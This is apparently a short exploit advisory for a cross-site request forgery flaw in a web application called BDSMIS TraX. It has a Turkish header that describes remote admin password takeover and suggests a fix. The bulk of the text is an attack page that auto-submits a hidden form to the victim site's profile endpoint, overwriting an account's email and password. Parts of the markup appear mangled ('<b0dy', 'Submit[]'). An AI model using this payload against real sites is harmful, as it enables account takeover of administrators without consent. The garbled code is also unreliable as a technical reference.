< ------------------- header data start ------------------- >

#############################################################

# Application Name : BDSMIS TraX

# Vulnerable Type : XSRF

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers/BizaRRo

############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<b0dy onLoad=Submit();>
<script>function Submit[]{document.form1.submit();}</script>

<form name=form1 method=post

action=http://SITE.com/[PATCH]/leavesystem/modules/leave_system/GeneralUser/UserProfile.asp>

<input name=txtEmail type=hidden class=Forms id=txtEmail3 value=[email protected] size=40>
<input name=txtpass type=hidden class=Forms id=txtpass2 value=addadd>

<input name=Submit type=submit class=loginButton value=update>
<input type=hidden name=MM_update value=form1>
<input type=hidden name=MM_recordId value=3>

< -- bug code end of -- >